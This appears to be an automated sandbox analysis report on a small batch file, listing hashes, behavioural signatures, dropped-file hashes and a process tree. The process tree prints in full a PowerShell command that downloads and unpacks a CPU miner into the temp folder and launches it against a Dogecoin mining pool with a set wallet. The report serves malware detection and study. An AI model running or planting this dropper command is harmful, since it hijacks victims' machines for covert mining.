Analysis
-
max time kernel
1794s -
max time network
1791s -
platform
windows10-1703_x64 -
resource
win10-20231215-en -
resource tags
arch:x64arch:x86image:win10-20231215-enlocale:en-usos:windows10-1703-x64system -
submitted
04-02-2024 18:02
Static task
static1
Behavioral task
behavioral1
Sample
73u3Ito.bat
Resource
win10-20231215-en
Behavioral task
behavioral2
Sample
73u3Ito.bat
Resource
win10v2004-20231215-en
General
-
Target
73u3Ito.bat
-
Size
499B
-
MD5
fe74bff27516829a88cfbc6f6e99646f
-
SHA1
0c15d859211c79910b277d07e729bec7197a60cd
-
SHA256
b1f312f139949cac20d0591831ce57c227c6ac77ebd98edfcdafa5c0b02cd2bb
-
SHA512
a94dbaef073e7b62ff9827887f1da6837103316c5656719b176ba1c2a063066f5f159b8ca783208db629121beea33fb81a94b9e6f4f4ec2612ee923639947a98
Malware Config
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 2 4728 powershell.exe 4 4728 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 1096 cpuminer-sse2.exe -
Loads dropped DLL 5 IoCs
pid Process 1096 cpuminer-sse2.exe 1096 cpuminer-sse2.exe 1096 cpuminer-sse2.exe 1096 cpuminer-sse2.exe 1096 cpuminer-sse2.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 4728 powershell.exe 4728 powershell.exe 4728 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4728 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 3572 wrote to memory of 4728 3572 cmd.exe 75 PID 3572 wrote to memory of 4728 3572 cmd.exe 75 PID 4728 wrote to memory of 1848 4728 powershell.exe 76 PID 4728 wrote to memory of 1848 4728 powershell.exe 76 PID 1848 wrote to memory of 1096 1848 cmd.exe 78 PID 1848 wrote to memory of 1096 1848 cmd.exe 78
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\73u3Ito.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3572 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "Invoke-WebRequest -Uri 'https://github.com/JayDDee/cpuminer-opt/releases/download/v23.15/cpuminer-opt-23.15-windows.zip' -OutFile "$env:TEMP\cpuminer.zip"; Expand-Archive -Path "$env:TEMP\cpuminer.zip" -DestinationPath "$env:TEMP\cpuminer"; Set-Location -Path "$env:TEMP\cpuminer"; Start-Process -FilePath 'cmd.exe' -ArgumentList '/k', 'cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2'"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4728 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /k cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 23⤵
- Suspicious use of WriteProcessMemory
PID:1848 -
C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.execpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 24⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1096
-
-
-
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
250KB
MD52b542e27fef33b04be0c7518ef6fa7e3
SHA1e7d97499b98f0ffddcfe69abd7cf849a937273e6
SHA2565d477c08a4bbc5c5cefb351888bcba01d777ad87e9a16c1597cfb61d0685aaf0
SHA51211fd2f67df5774e0b2f16f08e2400ee60c077c3477529fff23175dc7521d3383b0a19fb59f7306759d33f702d706b29a7a0ad47f9e87ac553bee7f54e73becc2
-
Filesize
269KB
MD5c7d642970ed7688445a68fe237681439
SHA1bc87caf536769b4f17162a2c6e55b471fe0940e5
SHA256896eff7ef57f8dead3c321929f4898b3389fa9e885dd1a20ef9047ea4d9adba6
SHA51240fad239ae49c726089f537979920c32666f918e5d27c55454697356d007c55ac8bb2659b8868eefb948e9c77f589d53aee78bce283edaff0f78cb89d6668eac
-
Filesize
357KB
MD57772b46c632ae95314970932e2dfc9d4
SHA1a7812294a71fde4e6937df3321e861c388218b1c
SHA256bb4b287979e5a7df50d9bb75e384e50e5752e87442fbd02b6c4470abb26b1f84
SHA51299264d29c84d81395812a9078aa5c1667102997265810be45f9e1135294e945e2f528cc330826d9fa1cc58b75d85393ba55ad08531c45b1c1c6e6d891a373381
-
Filesize
211KB
MD544c38eb93bf75bd06d422e4c79a6743d
SHA10dc8606c8f014701f83f8e927b1f5ab6b2841d64
SHA2565011e71d6eb873aee4530d4c68c189901fb15a55351ba8abdf80963235aa875b
SHA512ea0328b7ef7e1fab4b22be2139acc51d1636b59b437882a1d049c4bca916b9725147a1004f7e7962b9f26684ca4da63525123ad867156336410e5a7dff174790
-
Filesize
250KB
MD53ca590947f779cd3d3ce40e08d7210fd
SHA1f21600a3f47e615a50212108cf1de509e1b8881b
SHA2564ca6970b050e9a4b0c20d9771a87d09d943744fd12243310bce22d70a069dc82
SHA512932cf33d244135b24f699bf997547c3a2df02af777135dc045e5ad9110d19f19e063c127bbd8f0200bbec0cf7d477e24e2da6fe3ac78777b68693fcda80b74a9
-
Filesize
295KB
MD5186a59484c85e3572eb09872fe4a50d4
SHA159fce8df2cb1fbed188c17050a39acd3301ed137
SHA256eefc172c5fe6b8bc403a64293f717a6b362a16c2c52e60063c87eb1373629acf
SHA512dd08fa7b445a862043583e201828dc0ba66e5466f3aa4047fe9c84a434f66cf8ddfaa549d7484b5c4be2787f8c4dd4105587042b749f997f2de1ea747eb2e0d4
-
Filesize
365KB
MD5fab53c0d02aec8bab1d21269a889e396
SHA1cbb52d72224ba4d2ceb7bb11616d81c1528b79fc
SHA2568b509784753513d1f6330686be3fee06ace972ffcbc1fe493fdfe56fb9236446
SHA5122aa60307f6a6f8f0bda4b68ee59f2eba38a1d21db546f546a46fa1a5e5c6495385313d7ef026c74dda4a2f4a35793919d8ed16110badb4bf95bb34334b46e5a6
-
Filesize
311KB
MD5cc3ec3df45bbcf64f61435342d6eb247
SHA111b090c09c8a59dfd39555e24542042e7324a6ab
SHA25651a2a9e1d424a73154dbff4a3f0d4d8e78ea566f18ef6afdd7b25d2d69728096
SHA51211dda5154e52eecea9816ebc3c976c4c81285dcb08e7d12ad85a4b809725660cdccbcee7ffb26253f9cdc232eaa33719068706b42d5c0e786a85d95fd0b4e5d3
-
Filesize
311KB
MD5f5b80e45c62c490abec3c3e4555db404
SHA188419b5d7b219b8e9a19d1e09f6669ba2cf68921
SHA2564f4452a06d01acf765fea4034cbc1a198ab4cbd9a200ae752bfc2e3190994cde
SHA512598768f899f9a256890bde4cf2954b0b15af86d5afe9d5d13c05cb4c819070ff312583a425a4aa976e8e6d76bf881242f116797b7a38388d9bd54638c21c977b
-
Filesize
367KB
MD5b3a07a62005b2acac8666bba9fe3fdb0
SHA193852c69f07ca6e2782adf279ce6e6b145006fe4
SHA256a63b01b65baf4670eace92f7c739b6170d66d8c804908769a120ac9f5a565429
SHA512f244a2b77d7cc1af947a9ec9d6793d1122e9e1cc1ea6646f4607a34d5f9ef182881b645b560ba559f911ac9c307bc49d682b0dda7e60446778a3de8566b83b50
-
Filesize
291KB
MD5dcee1e903585f23073d836f04ad37d9d
SHA17da46484c1ec4c4c3645404d4f94fbcb53172058
SHA25688e87efc6e98f8d0704ebeab83a80b3784a767fe2cd826018f2e974d37ec1eaf
SHA512427558b4a6557ec57024a1826eacdaf1f97d529ffee06f39a125ae7cc716c54b3c56a6fd743e31258d9fd4152ff58efd62ab9cc164cc80c444c5061b8dac8801